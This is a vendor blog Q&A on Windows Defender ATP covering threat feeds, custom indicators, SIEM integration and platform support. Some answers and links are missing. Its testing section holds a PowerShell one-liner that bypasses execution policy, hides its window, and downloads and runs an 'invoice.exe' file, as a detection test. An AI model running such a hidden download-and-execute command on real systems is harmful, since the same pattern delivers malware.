SharePoint Stuff

Windows Defender Advanced Threat Protection (WDATP) Q&A

Written by Luke Smith. Posted in Microsoft

Q:Can you configure Defender ATP to use additional or different security threat feeds such as: FireEye, LookingGlass, Infoblox, SecureWorks, RSA, McAfee, Customer prebuilt feed)
Q: Are you able to block particular MD5\applications
A: You can create custom IOC’s and TI;s using API or PS (
Q Can you define automatic custom isolation and block rules (based on MD5 and application names)
Q: Can you Change the ratings of the existing threat categories?
A: Only for the custom Indicators of Compromise IOC’s or Threat Intelligence TI’s
Q:Can you Integrate with other SIEMs\SOCs
A: Currently only HP and splunk
Q: Can Defender ATP Integrate with third-party CMDBs
A: AD using AD connect – TBc for third-parties such as SCCM\LANDesk
Q: Can Windows Defender ATP integrate with Office ATP
A: Yes, WDATP and O365ATP can be integrated and needs enabling as per the following: and
Q: Can Defender ATP work with older versions of Windows below 8.1?
A: No, but does work with Windows Server 2012R2 and above
Q: Can Defender ATP work with non-windows based machines
A: Yes, requires Bitdefender and can run on macOS, Linux, iOS and Android: (Other third-parties such as Lookout and Ziften will be added Nov 2017)
Q: Can Defender integrate with Cloud App Security?
Q: How can I test Defender ATP
A: see: – text file containing remove the <>
A: once configured and also run:
powershell.exe -NoExit -ExecutionPolicy Bypass -WindowStyle Hidden (New-Object System.Net.WebClient).DownloadFile(‘’, ‘C:\test-WDATP-test\invoice.exe’);Start-Process ‘C:\test-WDATP-test\invoice.exe’

Useful Links:
Windows Defender Advanced Threat Protection – Ransomware response playbook

Tags: , , ,

Trackback from your site.

Luke Smith

I’ve been working with Microsoft Technologies for over 20 years, my main focus now being Microsoft Online Services. I manage the Cloud Services at ElysianIT Limited and as a P-SELLER at Microsoft. I have worked with many organisations from SMC to Enterprise. I’ve been working with Microsoft Technologies since DOS 5.0, to date I have been working on Microsoft’s latest cloud technology Windows Azure, Windows 10 Office 365 and Microsoft SharePoint

Leave a comment